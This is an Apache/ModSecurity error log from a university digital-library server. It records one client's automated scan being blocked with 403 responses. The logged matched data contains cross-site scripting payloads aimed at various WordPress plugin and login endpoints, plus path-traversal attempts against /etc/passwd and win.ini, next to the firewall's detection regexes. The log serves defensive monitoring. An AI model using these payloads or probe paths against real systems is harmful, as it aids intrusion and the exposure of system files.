[Tue Aug 29 11:56:10.564097 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:backurl: 1 onmouseover=alert(/document.domain/) y="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/plugins/template/login.php"] [unique_id "ZO16asCo-f0AAArC7g0AAAAW"]
[Tue Aug 29 11:56:10.576688 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/wp-symposium/get_album_item.php"] [unique_id "ZO16asCo-f0AAAqeFkEAAAAx"]
[Tue Aug 29 11:56:11.579981 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:returnTo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:returnTo: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/login.html"] [unique_id "ZO16a8Co-f0AAApbUxUAAAAh"]
[Tue Aug 29 11:56:11.666551 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/login/"] [unique_id "ZO16a8Co-f0AAAolKz8AAAAe"]
[Tue Aug 29 11:56:12.543929 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO16bMCo-f0AAArC7hYAAAAW"]
[Tue Aug 29 11:56:12.556763 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:urll. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:urll: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/r2w/signIn.do"] [unique_id "ZO16bMCo-f0AAApbUxgAAAAh"]
[Tue Aug 29 11:56:13.614736 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/ie50/system/login/SysLoginUser.aspx"] [unique_id "ZO16bcCo-f0AAApXgtgAAAAU"]
[Tue Aug 29 11:56:15.169186 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/system/login/SysLoginUser.aspx"] [unique_id "ZO16b8Co-f0AAAq@sicAAAAM"]
[Tue Aug 29 11:56:15.209043 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16b8Co-f0AAAq3a8UAAAAI"]
[Tue Aug 29 11:56:15.590684 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:aoid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:aoid: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php"] [unique_id "ZO16b8Co-f0AAApXgtwAAAAU"]
[Tue Aug 29 11:56:16.927931 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/kindeditor/php/demo.php"] [unique_id "ZO16cMCo-f0AAAocygQAAAAR"]
[Tue Aug 29 11:56:17.179232 2023] [:error] [pid 2742] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:serviceestimatekey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:serviceestimatekey: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/car1/estimateresult/result"] [unique_id "ZO16ccCo-f0AAAq2KggAAAAE"]
[Tue Aug 29 11:56:17.786410 2023] [:error] [pid 2742] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/php/demo.php"] [unique_id "ZO16ccCo-f0AAAq2KhEAAAAE"]
[Tue Aug 29 11:56:18.859671 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16csCo-f0AAAqeFmwAAAAx"]
[Tue Aug 29 11:56:19.549115 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ver. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ver: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php"] [unique_id "ZO16c8Co-f0AAAqsV7sAAAAB"]
[Tue Aug 29 11:56:21.708961 2023] [:error] [pid 2761] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dcCo-f0AAArJXj8AAAAZ"]
[Tue Aug 29 11:56:21.752942 2023] [:error] [pid 2761] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:section: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dcCo-f0AAArJXkEAAAAZ"]
[Tue Aug 29 11:56:22.540289 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dsCo-f0AAArLLcYAAAAb"]
[Tue Aug 29 11:56:23.527100 2023] [:error] [pid 2761] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22\\x22  found within ARGS:message: <img src=\\x22\\x22 onerror=\\x22alert(1);\\x22>1</img>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/Pacs/login.php"] [unique_id "ZO16d8Co-f0AAArJXlwAAAAZ"]
[Tue Aug 29 11:56:23.684700 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:searchTerm: x' alert(1) 'x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16d8Co-f0AAArLLc8AAAAb"]
[Tue Aug 29 11:56:24.846722 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ),// found within ARGS:searchTerm: x\\x5c' alert(1),//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16eMCo-f0AAArLLdoAAAAb"]
[Tue Aug 29 11:56:25.632514 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:redirect_to: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16ecCo-f0AAAqsV80AAAAB"]
[Tue Aug 29 11:56:27.307978 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:referer. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:referer: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/src/login.php"] [unique_id "ZO16e8Co-f0AAArIAU0AAAAX"]
[Tue Aug 29 11:56:29.865318 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class_key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:class_key: ../../../../../../../../../../windows/win.ini\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/manager/controllers/default/resource/tvs.php"] [unique_id "ZO16fcCo-f0AAArB100AAAAV"]
[Tue Aug 29 11:56:30.560631 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:page: \\x22/></script><script>alert(document.domain)</script><b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php"] [unique_id "ZO16fsCo-f0AAAqsV9sAAAAB"]
[Tue Aug 29 11:56:30.587820 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/php/ssh_form.php"] [unique_id "ZO16fsCo-f0AAAqeFo4AAAAx"]
[Tue Aug 29 11:56:32.968091 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.28.0.1_abfa90f666903dc891da995b2ce41b245c240c54"): Internal error [hostname "digilibft.unla.ac.id"] [uri "/embed.js"] [unique_id "ZO16gMCo-f0AAAqSw8YAAAAN"]
[Tue Aug 29 11:56:33.619658 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:a</script><script>alert(/XSS/)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:a</script><script>alert(/XSS/)</script>: a</script><script>alert(/XSS/)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/aa404bb"] [unique_id "ZO16gcCo-f0AAAocykUAAAAR"]
